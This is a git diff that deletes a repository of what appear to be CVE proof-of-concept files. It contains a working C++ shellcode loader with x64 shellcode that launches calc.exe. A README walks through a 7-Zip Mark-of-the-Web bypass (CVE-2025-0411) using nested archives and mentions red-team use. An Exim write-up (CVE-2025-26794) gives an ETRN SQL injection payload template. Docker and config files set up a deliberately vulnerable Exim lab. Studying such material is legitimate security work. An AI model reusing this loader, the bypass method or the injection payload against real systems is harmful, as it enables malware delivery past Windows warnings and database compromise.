0x41, - 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, - 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, - 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, - 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, - 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, - 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, - 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, - 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, - 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, - 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, - 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, - 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, - 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, - 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, - 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, - 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, - 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, - 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, - 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, - 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, - 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00}; - -int main() -{ - void *exec_mem; - BOOL success; - HANDLE threadHandle; - DWORD oldProtect = 0; - - exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); - if (!exec_mem) - { - MessageBoxA(NULL, "VirtualAlloc failed", "ERROR", MB_OK); - return -1; - } - - memcpy(exec_mem, shellcode, sizeof(shellcode)); - - success = VirtualProtect(exec_mem, sizeof(shellcode), PAGE_EXECUTE_READ, &oldProtect); - if (!success) - { - MessageBoxA(NULL, "VirtualProtect failed", "ERROR", MB_OK); - return -1; - } - - threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL); - if (!threadHandle) - { - MessageBoxA(NULL, "CreateThread failed", "ERROR", MB_OK); - return -1; - } - - WaitForSingleObject(threadHandle, INFINITE); - - return 0; -} \ No newline at end of file diff --git a/CVE-2025-0411/pictures/SmartScreen.png b/CVE-2025-0411/pictures/SmartScreen.png deleted file mode 100644 index 5455f5b..0000000 Binary files a/CVE-2025-0411/pictures/SmartScreen.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/calc.png b/CVE-2025-0411/pictures/calc.png deleted file mode 100644 index f7fcae5..0000000 Binary files a/CVE-2025-0411/pictures/calc.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/dir_command.png b/CVE-2025-0411/pictures/dir_command.png deleted file mode 100644 index f35f58c..0000000 Binary files a/CVE-2025-0411/pictures/dir_command.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/double_compression.png b/CVE-2025-0411/pictures/double_compression.png deleted file mode 100644 index be25fb8..0000000 Binary files a/CVE-2025-0411/pictures/double_compression.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/mediafire.png b/CVE-2025-0411/pictures/mediafire.png deleted file mode 100644 index 64ba650..0000000 Binary files a/CVE-2025-0411/pictures/mediafire.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/powershell_stream.png b/CVE-2025-0411/pictures/powershell_stream.png deleted file mode 100644 index 4afb737..0000000 Binary files a/CVE-2025-0411/pictures/powershell_stream.png and /dev/null differ diff --git a/CVE-2025-0411/readme.md b/CVE-2025-0411/readme.md deleted file mode 100644 index d18e8a8..0000000 --- a/CVE-2025-0411/readme.md +++ /dev/null @@ -1,71 +0,0 @@ - -# 7-Zip Allows MoTW Bypass in Nested Zip Files - -## PoC -##### **Note**, this PoC is desgined to demonstrate the MoTW bypass and hence would be needed to follow along by turning _**off**_ the **Windows Defender**. The intention is to demonstrate the bypass, if needed to use in the real world red teaming scenarios, the Python Script can be used for version detection and double compression purposes. -### Introduction -[CVE-2025-0411](https://nvd.nist.gov/vuln/detail/CVE-2025-0411) is a recently discovered vulnerability in the popular 7-Zip file archiver software that allows attackers to bypass Windows’ Mark-of-the-Web (MoTW) protection mechanism. This bypass enables malicious files extracted from specially crafted archives to execute without triggering security warnings, exposing users to potential threats such as malware and phishing attacks. The PoC to be demonstrated builds up on it, it covers how an attacker can craft a nested archive to evade MoTW protections. - -#### Understanding the Files - -##### 7-Zip-CVE-2025-0411-PoC.py (Python Script) -This script automates the process of checking the version of the installed 7Zip version, compilation and compression of a C++ executable: - -* **Version Checking** checks if 7Zip is installed on the target system or not and then also version checks it to see if the installed version is vulnerable or not. - -* **Compiles** a C++ source file (executable.cpp) into a statically linked Windows executable (execute.exe) using g++. - -* **Compresses** the generated executable into a .7z archive using 7-Zip. - -* **Further compresses** the first archive (executable.7z) into a final .7z archive (final.7z). - -The script ensures the process runs sequentially, checking for file and software existence before proceeding. - -##### Executable.cpp (C++ Shellcode Loader) - -This C++ program executes shellcode in memory: - -* **Allocates** memory (VirtualAlloc) with read-write permissions. - -* **Copies shellcode** for running calc.exe into the allocated memory. - -* **Changes memory protection** to executable (VirtualProtect). - -* **Creates a new thread** (CreateThread) to execute the shellcode. - -* **Waits** for execution to complete. - -#### Preparation of the Nested .7z and obtaining the MoTW -After cloning the repository, we need to run the script via any terminal in order to detect the version of the software used and to compress our shellcode file. - -![Command Execution](pictures/double_compression.png "Running the Python Script") - -After double compressing the file, we have successfully gotten a nested file. But, if we try to access the file from the 7Zip GUI(accessing it through 7Zip in general), it would not result into our desired response because our file is still missing it's key component, the MoTW. - -To solve this issue, we can upload the file _final.7z_ to any platform like MediaFire, Google Drive, Mega etc. This is used in order to simulate the delivery of our .7z file, - -![MediaFire Interface](pictures/mediafire.png "Final file uploaded on MediaFire") - -After we download our file, it now bears the MoTW. We can confirm it via running the following commands, - - > dir /R (Can be used in either CMD or PowerShell) - -![Command Execution](pictures/dir_command.png "Output of Dir /R") - - > Get-Item .\final.7z -Stream * (To be used in PowerShell) - -![Command Execution](pictures/powershell_stream.png "Output of the PowerShell command") - -In the aforementioned we observe the file having an Alternate Data Stream rather than the original ::$DATA which has the file data, the second stream containing the Zone.Identifier stream confirms the MoTW. - - -#### Execution - -In versions where the vulnerability is patched we see that when we access the compiled executable via the 7-Zip software we see a SmartScreen alert blocking the execution of our shellcode. This is because of the correct migration of the MoTW from each nested file, mitigating the issue. -[![SmartScreen blocking the shellcode execution](pictures/SmartScreen.png)](videos/SmartScreen-.mp4) - -Whereas, in an ideal situation where we have 7-Zip installed and our version is vulnerable(prior to 24.09) we can now access the file via opening it via 7-Zip and we can see how our shellcode can execute successfully. -[![Execution of the shellcode](pictures/calc.png)](videos/Calc.mp4) - - - diff --git a/CVE-2025-0411/videos/Calc.mp4 b/CVE-2025-0411/videos/Calc.mp4 deleted file mode 100644 index 33144b5..0000000 Binary files a/CVE-2025-0411/videos/Calc.mp4 and /dev/null differ diff --git a/CVE-2025-0411/videos/SmartScreen-.mp4 b/CVE-2025-0411/videos/SmartScreen-.mp4 deleted file mode 100644 index b600f8e..0000000 Binary files a/CVE-2025-0411/videos/SmartScreen-.mp4 and /dev/null differ diff --git a/CVE-2025-26794/Readme.md b/CVE-2025-26794/Readme.md deleted file mode 100644 index 5f0c3aa..0000000 --- a/CVE-2025-26794/Readme.md +++ /dev/null @@ -1,68 +0,0 @@ -# Overview of CVE-2025-26794 - -CVE-2025-26794 is a critical SQL injection vulnerability affecting Exim Mail Server, specifically impacting version 4.98. The vulnerability is in the `hintsdb.h` file (now relocated to `hints_sqlite.h` in newer versions) and is related to Exim’s SQLite-based hints database used with ETRN serialization. Due to unsafe SQL query handling, remote attackers can craft malicious ETRN requests (ETRN request is a command that instructs a mail server to deliver all emails for a domain to another SMTP server.) to execute unauthorized SQL commands, potentially compromising the mail server’s database and overall integrity. - -## Root Cause of the Vulnerability - -### Unvalidated User Input in SQL Queries -- The system concatenated user input directly into SQL statements without proper sanitization, allowing attackers to manipulate the database. -- Specifically, ETRN requests were processed without adequate filtering, opening the door for SQL injection. - -### Unsafe String Handling & Memory Mismanagement -- Improper string termination checks allowed malformed keys to be processed. -- Dynamic memory allocations lacked boundary checks, increasing the risk of buffer overflows and segmentation faults. - -### Direct Execution of Unescaped SQL Queries -- Functions like `sqlite3_exec` and `sprintf` were used with user-supplied data without escaping or parameterization. -- The function `exim_s_dbp` was particularly implicated in this issue. - -## Exploitation Vector - -Attackers could manipulate ETRN commands to inject SQL code. Example payload: - -```sql -ETRN #',1); ## INSERT SQL HERE ## /* -``` - -This exploit allowed arbitrary SQL execution, which could lead to unauthorized data modification, credential theft, or full database compromise. - -## Security Fixes Implemented - -To mitigate CVE-2025-26794, Exim maintainers introduced the following security patches: - -### Introduction of Parameterized Queries -- Replaced vulnerable string concatenation with prepared statements (`sqlite3_prepare_v2`). -- Used `sqlite3_bind_text` to securely insert user input instead of direct interpolation. - -### Stricter String Handling -- Introduced a new function `is_cstring()` to validate key integrity before processing. -- Ensured all input keys are null-terminated to prevent buffer overflows. - -### Enhanced Memory Safety -- Explicitly checked all memory allocations before use. -- Removed unsafe `malloc` and `memcpy` operations that could cause segmentation faults. - -### Secure Query Execution -- Eliminated `sqlite3_exec` calls in favor of safer, bound execution methods. -- Introduced explicit NULL checking for SQL statements to prevent unexpected crashes. - -## Mitigation Measures - -### Immediate Upgrade -- Users should update to Exim version 4.98.1 or later, where this vulnerability has been addressed. - -### Configuration Review -- Ensure the setting `acl_smtp_etrn` is set to `'deny'` unless ETRN functionality is explicitly required. -- Verify `smtp_etrn_serialize` is correctly configured to prevent unauthorized access. - -## Impact of the Fixes - -- SQL Injection risks were eliminated, preventing unauthorized database manipulation. -- Memory safety was significantly improved, reducing the likelihood of buffer overflows and crashes. -- Debugging capabilities were enhanced, allowing safer troubleshooting without exposing sensitive database queries. - -## Conclusion - -By addressing CVE-2025-26794, Exim’s maintainers have significantly hardened the security of its mail server database interactions, preventing attackers from leveraging SQL injection to compromise systems. These fixes ensure safer query execution, reinforce input validation, and reduce the risk of future vulnerabilities. - -Organizations using Exim should immediately upgrade to a patched version and review their configurations to ensure continued security. diff --git a/CVE-2025-26794/exim.mp4 b/CVE-2025-26794/exim.mp4 deleted file mode 100644 index 73d62e2..0000000 Binary files a/CVE-2025-26794/exim.mp4 and /dev/null differ diff --git a/CVE-2025-26794/files/Dockerfile b/CVE-2025-26794/files/Dockerfile deleted file mode 100644 index 4737f8c..0000000 --- a/CVE-2025-26794/files/Dockerfile +++ /dev/null @@ -1,36 +0,0 @@ -FROM debian - -RUN apt-get update -RUN apt-get install -y gcc net-tools vim gdb python3 wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev libpcre2-dev libssl-dev nano libsqlite3-dev sqlite3 telnet pkg-config -RUN cpan install File::FcntlLock - -RUN useradd -ms /bin/bash exim-demo - -RUN git clone https://github.com/Exim/exim.git - -## Checkout latest version -RUN cd exim && git checkout exim-4.98 && cd src && mkdir -p Local && cp src/EDITME Local/Makefile && cp exim_monitor/EDITME Local/eximon.conf - -WORKDIR /exim/src -RUN sed -i 's/^EXIM_USER=.*$/EXIM_USER=exim-demo/' Local/Makefile -RUN sed -i 's/^#\s*\(AUTH_PLAINTEXT=yes\)/\1/' Local/Makefile - -# Add debug flags -RUN sed -i 's/CFLAGS ?= -O\b/CFLAGS ?= -Og -g/' OS/Makefile-Linux - -RUN sed -i 's/^#\s*\(USE_OPENSSL=yes\)/\1/' Local/Makefile -RUN sed -i 's/^#\s*\(USE_OPENSSL_PC=openssl\)/\1/' Local/Makefile -## Add SQLITE Support -RUN sed -i 's/^#\s*\(USE_SQLITE = yes\)/\1/' Local/Makefile -RUN echo "DBMLIB = -lsqlite3" >> Local/Makefile - -RUN make makefile - -RUN make install - -COPY start-exim.sh . - -# runtime config -COPY configure /usr/exim/configure - - diff --git a/CVE-2025-26794/files/Makefile-Linux b/CVE-2025-26794/files/Makefile-Linux deleted file mode 100644 index dfb2fa8..0000000 --- a/CVE-2025-26794/files/Makefile-Linux +++ /dev/null @@ -1,39 +0,0 @@ -# Exim: OS-specific make file for Linux. This is for modern Linuxes, -# which use libc6. -# Copyright (c) The Exim Maintainers 2020 -# -# For Linux, we assume GNU Make; at time of writing, the only extension -# used is ?= which is actually portable to other maintained Make variants, -# just is not POSIX. - -HAVE_ICONV=yes - -BASENAME_COMMAND=look_for_it -CHOWN_COMMAND=look_for_it -CHGRP_COMMAND=look_for_it -CHMOD_COMMAND=look_for_it - -# The system cc may be gcc or clang; do not force gcc -CC=cc -# Preserve CFLAGS and CFLAGS_DYNAMIC from the caller/environment -CFLAGS ?= -O -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -CFLAGS_DYNAMIC ?= -shared -rdynamic - -DBMLIB = -ldb -USE_DB = yes - -LIBS = -lcrypt -lm -LIBRESOLV = -lresolv - -X11=/usr/X11R6 -XINCLUDE=-I$(X11)/include -XLFLAGS=-L$(X11)/lib -X11_LD_LIB=$(X11)/lib - -EXIWHAT_PS_ARG=ax -EXIWHAT_EGREP_ARG='/exim( |$$)' -EXIWHAT_MULTIKILL_CMD=killall -EXIWHAT_MULTIKILL_ARG=exim -EXIWHAT_KILL_SIGNAL=-USR1 - -# End diff --git a/CVE-2025-26794/files/configure b/CVE-2025-26794/files/configure deleted file mode 100644 index 21dddf9..0000000 --- a/CVE-2025-26794/files/configure +++ /dev/null @@ -1,1032 +0,0 @@ - ###################################################################### -# Runtime configuration file for Exim # -###################################################################### - - -# This is a default configuration file which will operate correctly in -# uncomplicated installations. Please see the manual for a complete list -# of all the runtime configuration options that can be included in a -# configuration file. There are many more than are mentioned here. The -# manual is in the file doc/spec.txt in the Exim distribution as a plain -# ASCII file. Other formats (PostScript, Texinfo, HTML, PDF) are available -# from the Exim ftp sites. The manual is also online at the Exim website. - - -# This file is divided into several parts, all but the first of which are -# headed by a line starting with the word "begin". Only those parts that -# are required need to be present. Blank lines, and lines starting with # -# are ignored. - - -########### IMPORTANT ########## IMPORTANT ########### IMPORTANT ########### -# # -# Whenever you change Exim's configuration file, you *must* remember to # -# HUP the Exim daemon, because it will not pick up the new configuration # -# until you do. However, any other Exim processes that are started, for # -# example, a process started by an MUA in order to send a message, will # -# see the new configuration as soon as it is in place. # -# # -# You do not need to HUP the daemon for changes in auxiliary files that # -# are referenced from this file. They are read every time they are used. # -# # -# It is usually a good idea to test a new configuration for syntactic # -# correctness before installing it (for example, by running the command # -# "exim -C /config/file.new -bV"). # -# # -########### IMPORTANT ########## IMPORTANT ########### IMPORTANT ########### - - - -###################################################################### -# MACROS # -###################################################################### -# - -# If you want to use a smarthost instead of sending directly to recipient -# domains, uncomment this macro definition and set a real hostname. -# An appropriately privileged user can then redirect email on the command-line -# in emergencies, via -D. -# -# ROUTER_SMARTHOST=MAIL.HOSTNAME.FOR.CENTRAL.SERVER.EXAMPLE - -###################################################################### -# MAIN CONFIGURATION SETTINGS # -###################################################################### -# - -# Specify your host's canonical name here. This should normally be the fully -# qualified "official" name of your host. If this option is not set, the -# uname() function is called to obtain the name. In many cases this does -# the right thing and you need not set anything explicitly. - -# primary_hostname = - - -# The next three settings create two lists of domains and one list of hosts. -# These lists are referred to later in this configuration using the syntax -# +local_domains, +relay_to_domains, and +relay_from_hosts, respectively. They -# are all colon-separated lists: - -domainlist local_domains = @ -domainlist relay_to_domains = -hostlist relay_from_hosts = localhost -# (We rely upon hostname resolution working for localhost, because the default -# uncommented configuration needs to work in IPv4-only environments.) - -# Most straightforward access control requirements can be obtained by -# appropriate settings of the above options. In more complicated situations, -# you may need to modify the Access Control Lists (ACLs) which appear later in -# this file. - -# The first setting specifies your local domains, for example: -# -# domainlist local_domains = my.first.domain : my.second.domain -# -# You can use "@" to mean "the name of the local host", as in the default -# setting above. This is the name that is specified by primary_hostname, -# as specified above (or defaulted). If you do not want to do any local -# deliveries, remove the "@" from the setting above. If you want to accept mail -# addressed to your host's literal IP address, for example, mail addressed to -# "user@[192.168.23.44]", you can add "@[]" as an item in the local domains -# list. You also need to uncomment "allow_domain_literals" below. This is not -# recommended for today's Internet. - -# The second setting specifies domains for which your host is an incoming relay. -# If you are not doing any relaying, you should leave the list empty. However, -# if your host is an MX backup or gateway of some kind for some domains, you -# must set relay_to_domains to match those domains. For example: -# -# domainlist relay_to_domains = *.myco.com : my.friend.org -# -# This will allow any host to relay through your host to those domains. -# See the section of the manual entitled "Control of relaying" for more -# information. - -# The third setting specifies hosts that can use your host as an outgoing relay -# to any other host on the Internet. Such a setting commonly refers to a -# complete local network as well as the localhost. For example: -# -# hostlist relay_from_hosts = <; 127.0.0.1 ; ::1 ; 192.168.0.0/16 -# -# The "/16" is a bit mask (CIDR notation), not a number of hosts. Note that you -# have to include 127.0.0.1 if you want to allow processes on your host to send -# SMTP mail by using the loopback address. A number of MUAs use this method of -# sending mail. Often, connections are made to "localhost", which might be ::1 -# on IPv6-enabled hosts. Do not forget CIDR for your IPv6 networks. - -# All three of these lists may contain many different kinds of item, including -# wildcarded names, regular expressions, and file lookups. See the reference -# manual for details. The lists above are used in the access control lists for -# checking incoming messages. The names of these ACLs are defined here: - -acl_smtp_rcpt = acl_check_rcpt -.ifdef _HAVE_PRDR -acl_smtp_data_prdr = acl_check_prdr -.endif -acl_smtp_data = acl_check_data -acl_smtp_etrn = acl_smtp_etrn -# You should not change those settings until you understand how ACLs work. - - -# If you are running a version of Exim that was compiled with the content- -# scanning extension, you can cause incoming messages to be automatically -# scanned for viruses. You have to modify the configuration in two places to -# set this up. The first of them is here, where you define the interface to -# your scanner. This example is typical for ClamAV; see the manual for details -# of what to set for other virus scanners. The second modification is in the -# acl_check_data access control list (see below). - -# av_scanner = clamd:/tmp/clamd - - -# For spam scanning, there is a similar option that defines the interface to -# SpamAssassin. You do not need to set this if you are using the default, which -# is shown in this commented example. As for virus scanning, you must also -# modify the acl_check_data access control list to enable spam scanning. - -# spamd_address = 127.0.0.1 783 - - -# If Exim is compiled with support for TLS, you may want to change the -# following option so that Exim disallows certain clients from makeing encrypted -# connections. The default is to allow all. -# In the authenticators section below, there are template configurations for -# plaintext username/password authentication. This kind of authentication is -# only safe when used within a TLS connection, so the authenticators will only -# work if TLS is allowed here. - -# This is equivalent to the default. - -# tls_advertise_hosts = * - -# Specify the location of the Exim server's TLS certificate and private key. -# The private key must not be encrypted (password protected). You can put -# the certificate and private key in the same file, in which case you only -# need the first setting, or in separate files, in which case you need both -# options. - -# tls_certificate = /etc/ssl/exim.crt -# tls_privatekey = /etc/ssl/exim.pem - -# For OpenSSL, prefer EC- over RSA-authenticated ciphers -.ifdef _HAVE_OPENSSL -tls_require_ciphers = ECDSA:RSA:!COMPLEMENTOFDEFAULT -.endif - -# Don't offer resumption to (most) MUAs, who we don't want to reuse -# tickets. Once the TLS extension for vended ticket numbers comes -# though, re-examine since resumption on a single-use ticket is still a benefit. -.ifdef _HAVE_TLS_RESUME -tls_resumption_hosts = ${if inlist {$received_port}{587:465} {:}{*}} -.endif - -# In order to support roaming users who wish to send email from anywhere, -# you may want to make Exim listen on other ports as well as port 25, in -# case these users need to send email from a network that blocks port 25. -# The standard ports for this purpose are: -# port 587, the "message submission" port - see RFC 4409 for details, -# and 465 the TLS-encrypted "submission" port, service name is "submissions", -# see RFC 8314. - -# Microsoft MUAs cannot be configured to -# talk the message submission protocol correctly, so if you need to support -# them you should also allow TLS-on-connect on the traditional (and now -# standard) port 465. - -# daemon_smtp_ports = 25 : 465 : 587 -# tls_on_connect_ports = 465 - - -# Specify the domain you want to be added to all unqualified addresses -# here. An unqualified address is one that does not contain an "@" character -# followed by a domain. For example, "caesar@rome.example" is a fully qualified -# address, but the string "caesar" (i.e. just a login name) is an unqualified -# email address. Unqualified addresses are accepted only from local callers by -# default. See the recipient_unqualified_hosts option if you want to permit -# unqualified addresses from remote sources. If this option is not set, the -# primary_hostname value is used for qualification. - -# qualify_domain = - - -# If you want unqualified recipient addresses to be qualified with a different -# domain to unqualified sender addresses, specify the recipient domain here. -# If this option is not set, the qualify_domain value is used. - -# qualify_recipient = - - -# The following line must be uncommented if you want Exim to recognize -# addresses of the form "user@[10.11.12.13]" that is, with a "domain literal" -# (an IP address) instead of a named domain. The RFCs still require this form, -# but it makes little sense to permit mail to be sent to specific hosts by -# their IP address in the modern Internet. This ancient format has been used -# by those seeking to abuse hosts by using them for unwanted relaying. If you -# really do want to support domain literals, uncomment the following line, and -# see also the "domain_literal" router below. - -# allow_domain_literals - - -# No deliveries will ever be run under the uids of users specified by -# never_users (a colon-separated list). An attempt to do so causes a panic -# error to be logged, and the delivery to be deferred. This is a paranoic -# safety catch. There is an even stronger safety catch in the form of the -# FIXED_NEVER_USERS setting in the configuration for building Exim. The list of -# users that it specifies is built into the binary, and cannot be changed. The -# option below just adds additional users to the list. The default for -# FIXED_NEVER_USERS is "root", but just to be absolutely sure, the default here -# is also "root". - -# Note that the default setting means you cannot deliver mail addressed to root -# as if it were a normal user. This isn't usually a problem, as most sites have -# an alias for root that redirects such mail to a human administrator. - -never_users = root - - -# The setting below causes Exim to do a reverse DNS lookup on all incoming -# IP calls, in order to get the true host name. If you feel this is too -# expensive, you can specify the networks for which a lookup is done, or -# remove the setting entirely. - -host_lookup = * - - -# The setting below causes Exim to try to initialize the system resolver -# library with DNSSEC support. It has no effect if your library lacks -# DNSSEC support. - -dns_dnssec_ok = 1 - - -# The settings below cause Exim to make RFC 1413 (ident) callbacks -# for all incoming SMTP calls. You can limit the hosts to which these -# calls are made, and/or change the timeout that is used. If you set -# the timeout to zero, all RFC 1413 calls are disabled. RFC 1413 calls -# are cheap and can provide useful information for tracing problem -# messages, but some hosts and firewalls have problems with them. -# This can result in a timeout instead of an immediate refused -# connection, leading to delays on starting up SMTP sessions. -# (The default was reduced from 30s to 5s for release 4.61. and to -# disabled for release 4.86) -# -#rfc1413_hosts = * -#rfc1413_query_timeout = 5s - - -# Enable an efficiency feature. We advertise the feature; clients -# may request to use it. For multi-recipient mails we then can -# reject or accept per-user after the message is received. -# This supports recipient-dependent content filtering; without it -# you have to temp-reject any recipients after the first that have -# incompatible filtering, and do the filtering in the data ACL. -# Even with this enabled, you must support the old style for peers -# not flagging support for PRDR (visible via $prdr_requested). -# -.ifdef _HAVE_PRDR -prdr_enable = true -.endif - - -# By default, Exim expects all envelope addresses to be fully qualified, that -# is, they must contain both a local part and a domain. If you want to accept -# unqualified addresses (just a local part) from certain hosts, you can specify -# these hosts by setting one or both of -# -# sender_unqualified_hosts = -# recipient_unqualified_hosts = -# -# to control sender and recipient addresses, respectively. When this is done, -# unqualified addresses are qualified using the settings of qualify_domain -# and/or qualify_recipient (see above). - - -# Unless you run a high-volume site you probably want more logging -# detail than the default. Adjust to suit. - -log_selector = +smtp_protocol_error +smtp_syntax_error \ - +tls_certificate_verified - - -# If you want Exim to support the "percent hack" for certain domains, -# uncomment the following line and provide a list of domains. The "percent -# hack" is the feature by which mail addressed to x%y@z (where z is one of -# the domains listed) is locally rerouted to x@y and sent on. If z is not one -# of the "percent hack" domains, x%y is treated as an ordinary local part. This -# hack is rarely needed nowadays; you should not enable it unless you are sure -# that you really need it. -# -# percent_hack_domains = -# -# As well as setting this option you will also need to remove the test -# for local parts containing % in the ACL definition below. - - -# When Exim can neither deliver a message nor return it to sender, it "freezes" -# the delivery error message (aka "bounce message"). There are also other -# circumstances in which messages get frozen. They will stay on the queue for -# ever unless one of the following options is set. - -# This option unfreezes frozen bounce messages after two days, tries -# once more to deliver them, and ignores any delivery failures. - -ignore_bounce_errors_after = 2d - -# This option cancels (removes) frozen messages that are older than a week. - -timeout_frozen_after = 7d - - -# By default, messages that are waiting on Exim's queue are all held in a -# single directory called "input" which is itself within Exim's spool -# directory. (The default spool directory is specified when Exim is built, and -# is often /var/spool/exim/.) Exim works best when its queue is kept short, but -# there are circumstances where this is not always possible. If you uncomment -# the setting below, messages on the queue are held in 62 subdirectories of -# "input" instead of all in the same directory. The subdirectories are called -# 0, 1, ... A, B, ... a, b, ... z. This has two benefits: (1) If your file -# system degrades with many files in one directory, this is less likely to -# happen; (2) Exim can process the queue one subdirectory at a time instead of -# all at once, which can give better performance with large queues. - -# split_spool_directory = true - - -# If you're in a part of the world where ASCII is not sufficient for most -# text, then you're probably familiar with RFC2047 message header extensions. -# By default, Exim adheres to the specification, including a limit of 76 -# characters to a line, with encoded words fitting within a line. -# If you wish to use decoded headers in message filters in such a way -# that successful decoding of malformed messages matters, you may wish to -# configure Exim to be more lenient. -# -# check_rfc2047_length = false -# -# In particular, the Exim maintainers have had multiple reports of problems -# from Russian administrators of issues until they disable this check, -# because of some popular, yet buggy, mail composition software. - - -# If you wish to be strictly RFC compliant, or if you know you'll be -# exchanging email with systems that are not 8-bit clean, then you may -# wish to disable advertising 8BITMIME. Uncomment this option to do so. - -# accept_8bitmime = false - - -# Exim does not make use of environment variables itself. However, -# libraries that Exim uses (e.g. LDAP) depend on specific environment settings. -# There are two lists: keep_environment for the variables we trust, and -# add_environment for variables we want to set to a specific value. -# Note that TZ is handled separately by the timezone runtime option -# and TIMEZONE_DEFAULT buildtime option. - -# keep_environment = ^LDAP -# add_environment = PATH=/usr/bin::/bin - - - -###################################################################### -# ACL CONFIGURATION # -# Specifies access control lists for incoming SMTP mail # -###################################################################### - -begin acl - -acl_smtp_etrn: - accept - - -# This access control list is used for every RCPT command in an incoming -# SMTP message. The tests are run in order until the address is either -# accepted or denied. - -acl_check_rcpt: - - # Accept if the source is local SMTP (i.e. not over TCP/IP). We do this by - # testing for an empty sending host field. - - accept hosts = : - control = dkim_disable_verify - - ############################################################################# - # The following section of the ACL is concerned with local parts that contain - # @ or % or ! or / or | or dots in unusual places. - # - # The characters other than dots are rarely found in genuine local parts, but - # are often tried by people looking to circumvent relaying restrictions. - # Therefore, although they are valid in local parts, these rules lock them - # out, as a precaution. - # - # Empty components (two dots in a row) are not valid in RFC 2822, but Exim - # allows them because they have been encountered. (Consider local parts - # constructed as "firstinitial.secondinitial.familyname" when applied to - # someone like me, who has no second initial.) However, a local part starting - # with a dot or containing /../ can cause trouble if it is used as part of a - # file name (e.g. for a mailing list). This is also true for local parts that - # contain slashes. A pipe symbol can also be troublesome if the local part is - # incorporated unthinkingly into a shell command line. - # - # Two different rules are used. The first one is stricter, and is applied to - # messages that are addressed to one of the local domains handled by this - # host. The line "domains = +local_domains" restricts it to domains that are - # defined by the "domainlist local_domains" setting above. The rule blocks - # local parts that begin with a dot or contain @ % ! / or |. If you have - # local accounts that include these characters, you will have to modify this - # rule. - - deny message = Restricted characters in address - domains = +local_domains - local_parts = ^[.] : ^.*[@%!/|] - - # The second rule applies to all other domains, and is less strict. The line - # "domains = !+local_domains" restricts it to domains that are NOT defined by - # the "domainlist local_domains" setting above. The exclamation mark is a - # negating operator. This rule allows your own users to send outgoing - # messages to sites that use slashes and vertical bars in their local parts. - # It blocks local parts that begin with a dot, slash, or vertical bar, but - # allows these characters within the local part. However, the sequence /../ - # is barred. The use of @ % and ! is blocked, as before. The motivation here - # is to prevent your users (or your users' viruses) from mounting certain - # kinds of attack on remote sites. - - deny message = Restricted characters in address - domains = !+local_domains - local_parts = ^[./|] : ^.*[@%!] : ^.*/\\.\\./ - ############################################################################# - - # Accept mail to postmaster in any local domain, regardless of the source, - # and without verifying the sender. - - accept local_parts = postmaster - domains = +local_domains - - # Deny unless the sender address can be verified. - - require verify = sender - - # Reject all RCPT commands after too many bad recipients - # This is partly a defense against spam abuse and partly attacker abuse. - # Real senders should manage, by the time they get to 10 RCPT directives, - # to have had at least half of them be real addresses. - # - # This is a lightweight check and can protect you against repeated - # invocations of more heavy-weight checks which would come after it. - - deny condition = ${if and {\ - {>{$rcpt_count}{10}}\ - {<{$recipients_count}{${eval:$rcpt_count/2}}} }} - message = Rejected for too many bad recipients - logwrite = REJECT [$sender_host_address]: bad recipient count high [${eval:$rcpt_count-$recipients_count}] - - # Accept if the message comes from one of the hosts for which we are an - # outgoing relay. It is assumed that such hosts are most likely to be MUAs, - # so we set control=submission to make Exim treat the message as a - # submission. It will fix up various errors in the message, for example, the - # lack of a Date: header line. If you are actually relaying out out from - # MTAs, you may want to disable this. If you are handling both relaying from - # MTAs and submissions from MUAs you should probably split them into two - # lists, and handle them differently. - - # Recipient verification is omitted here, because in many cases the clients - # are dumb MUAs that don't cope well with SMTP error responses. If you are - # actually relaying out from MTAs, you should probably add recipient - # verification here. - - # Note that, by putting this test before any DNS black list checks, you will - # always accept from these hosts, even if they end up on a black list. The - # assumption is that they are your friends, and if they get onto a black - # list, it is a mistake. - - accept hosts = +relay_from_hosts - control = submission - control = dkim_disable_verify - - # Accept if the message arrived over an authenticated connection, from - # any host. Again, these messages are usually from MUAs, so recipient - 